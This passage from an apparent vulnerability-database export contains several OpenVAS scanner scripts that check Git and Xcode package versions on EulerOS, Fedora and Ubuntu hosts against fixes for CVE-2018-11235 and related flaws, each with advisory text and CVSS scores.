11:41:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:41:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1385)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1385\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1385\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1385 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nA shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:22", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-8386"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181377", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1377\");\n script_version(\"2020-01-23T11:23:49+0000\");\n script_cve_id(\"CVE-2017-8386\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:23:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:23:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1377)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1377\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1377\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1377 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. A remote, authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.(CVE-2017-8386)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 2.5.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~6.1.h4\", rls:\"EULEROSVIRT-2.5.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-02T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-75f7624a9f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874636", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_75f7624a9f_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-75f7624a9f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874636\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:58:45 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-75f7624a9f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-75f7624a9f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZDKYTV3LSCNQMBQXEHWGWIWGJUILTTE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:36", "description": "This host is installed with Apple Xcode\n and is prone to code execution and information disclosure vulnerabilities.", "cvss3": {}, "published": "2018-06-14T00:00:00", "type": "openvas", "title": "Apple Xcode Code Execution And Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Xcode Code Execution And Information Disclosure Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:xcode\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813606\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_bugtraq_id(104345, 104346);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-14 10:59:39 +0530 (Thu, 14 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Apple Xcode Code Execution And Information Disclosure Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Xcode\n and is prone to code execution and information disclosure vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Git software does not properly validate submodule 'names' supplied via the\n untrusted .gitmodules file when appending them to the '$GIT_DIR/modules'\n directory.\n\n - An input validation flaw in processing path names on NTFS-based systems to\n read random memory contents.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code and to obtain sensitive information\n that may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apple Xcode prior to version 9.4.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Xcode 9.4.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208895\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gather-package-list.nasl\", \"gb_xcode_detect_macosx.nasl\");\n script_mandatory_keys(\"ssh/login/osx_version\", \"Xcode/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || version_is_less(version:osVer, test_version:\"10.13.2\")){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nxcVer = infos['version'];\nxcpath = infos['location'];\n\nif(version_is_less(version:xcVer, test_version:\"9.4.1\"))\n{\n report = report_fixed_ver(installed_version:xcVer, fixed_version:\"9.4.1\", install_path:xcpath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for git USN-3671-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310843545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843545", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3671_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for git USN-3671-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843545\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-07 05:47:44 +0200 (Thu, 07 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for git USN-3671-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Etienne Stalmans discovered that git did not properly validate git\nsubmodules files. A remote attacker could possibly use this to craft a\ngit repo that causes arbitrary code execution when 'git clone --recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname\nsanity checking code when used on NTFS filesystems. An attacker could\nuse this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233)\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3671-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3671-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.14.1-1ubuntu4.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.17.1-1ubuntu0.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.7.4-0ubuntu1.4\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-02T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-080a3d7866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-15298", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_080a3d7866_git_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-080a3d7866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:59:40 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\", \"CVE-2017-15298\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-080a3d7866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-080a3d7866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MWKTL7J5P3OQER7IUHIJXFASGGZMYKI5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.14.4~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-11T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-1c1a318a0b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875175", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1c1a318a0b_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-1c1a318a0b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875175\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-11 08:54:28 +0200 (Thu, 11 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-1c1a318a0b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1c1a318a0b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6H7PLJSU6HD57BAZTTAYHPWURRSQKM6V\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-29afefd172", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2018-11233", "CVE-2018-19486"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875331", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_29afefd172_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-29afefd172\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875331\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-19486\", \"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:34:05 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for git FEDORA-2018-29afefd172\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-29afefd172\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIQD4R3AXAVLC7I56GWWF23JHSCDSW2J\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) 